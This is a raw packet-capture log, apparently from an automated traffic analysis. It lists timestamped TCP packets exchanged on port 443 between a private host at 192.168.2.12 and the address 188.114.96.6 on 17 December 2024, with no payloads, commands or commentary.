                                                                        Dec 17, 2024 08:38:40.760767937 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.760776043 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.760808945 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.765300989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.765325069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.765439987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.765448093 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.765487909 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.769246101 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.769270897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.769315958 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.769320965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.769397020 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.773931980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.773948908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.774008036 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.774014950 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.774071932 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.778428078 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.778450012 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.778500080 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.778506041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.778549910 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.782280922 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.782299042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.782350063 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.782356024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.782392025 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.782418966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.786129951 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.786147118 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.786235094 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.786241055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.786278009 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.948998928 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.949024916 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.949073076 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.949089050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.949135065 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.949135065 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.952775955 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.952794075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.952837944 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.952845097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.952868938 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.952891111 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.957617998 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.957643986 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.957678080 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.957684040 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.957722902 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.961391926 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.961410046 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.961448908 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.961456060 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.963660955 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.963660955 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.966089010 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.966106892 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.966160059 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.966166019 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.966207027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.970602989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.970618010 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.970669031 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.970678091 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.970722914 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.974564075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.974581003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.974627972 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.974633932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.974662066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.974684954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.978310108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.978327036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.978364944 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.978375912 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.978399038 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.978423119 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.141539097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.141578913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.141639948 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.141653061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.141685963 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.141701937 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.145313978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.145334959 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.145379066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.145390987 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.145431042 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.145445108 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.150008917 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.150028944 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.150072098 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.150078058 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.150113106 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.150136948 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.153923988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.153951883 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.154053926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.154066086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.154103994 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.158665895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.158682108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.158752918 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.158767939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.158807039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.162255049 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.162271976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.162343979 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.162364960 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.162412882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.166953087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.166970015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.167033911 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.167042971 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.167081118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.329961061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.329986095 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.330105066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.330105066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.330121994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.330238104 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.333276987 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.333295107 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.333399057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.333410978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.333501101 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.337168932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.337186098 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.337270021 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.337270021 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.337282896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.337409019 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.341933966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.341955900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.342099905 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.342112064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.342297077 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.345776081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.345797062 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.345978975 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.345992088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.346298933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.350477934 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.350497007 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.350912094 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.350929022 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.351039886 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.354981899 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.355001926 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.355072975 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.355089903 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.355200052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.358784914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.358802080 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.358856916 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.358864069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.358923912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.358923912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.522288084 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.522309065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.522459030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.522459030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.522473097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.522855043 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.525511980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.525527954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.525639057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.525646925 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.525825977 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.529320955 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.529337883 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.529509068 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.529516935 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.529655933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.534136057 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.534152031 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.534315109 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.534322977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.534573078 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.537950993 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.537967920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.538171053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.538177967 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.538281918 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.542824030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.542840958 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.542943001 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.542949915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.543045998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.547154903 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.547174931 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.547359943 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.547377110 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.547507048 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.551031113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.551047087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.551386118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.551393032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.551558018 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.714600086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.714664936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.714729071 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.714737892 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.714767933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.714915991 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.717920065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.717947006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.718027115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.718027115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.718039989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.718127012 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.721791983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.721807957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.721875906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.721875906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.721893072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.722074032 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.726531029 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.726555109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.726630926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.726630926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.726646900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.727159023 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.730397940 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.730412960 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.730622053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.730644941 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.730766058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.735125065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.735141039 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.735275984 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.735294104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.735563040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.739562035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.739576101 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.739696980 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.739711046 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.739929914 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.743498087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.743510962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.743592978 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.743622065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.743947029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.906642914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.906670094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.906735897 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.906759024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.906804085 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.906804085 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.910620928 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.910644054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.910731077 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.910731077 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.910737991 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.910933018 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.914475918 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.914499044 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.915426970 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.915442944 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.915960073 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.919219017 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.919238091 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.920993090 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.921015024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.921699047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.923125029 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.923146963 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.923259974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.923259974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.923269987 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.926050901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.928025961 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.928044081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.928148985 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.928148985 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.928158045 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.929836988 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.931360006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.931374073 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.934140921 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.934151888 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.936160088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.936187983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.936275959 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.936275959 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:41.936288118 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:41.937657118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.099252939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.099276066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.099483013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.099498034 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.099639893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.102530956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.102540016 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.102642059 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.102654934 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.102782965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.107295990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.107311010 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.107398033 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.107412100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.107743025 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.111191988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.111207008 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.111301899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.111301899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.111318111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.111454964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.115880966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.115896940 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.115983009 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.116000891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.118236065 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.119796991 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.119815111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.120003939 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.120027065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.120280981 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.124269962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.124285936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.126348019 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.126358032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.128052950 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.128077030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.128160000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.128160000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.128168106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.129892111 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:42.291341066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.291363001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:42.291462898 CET49716443192.168.2.12188.114.96.6
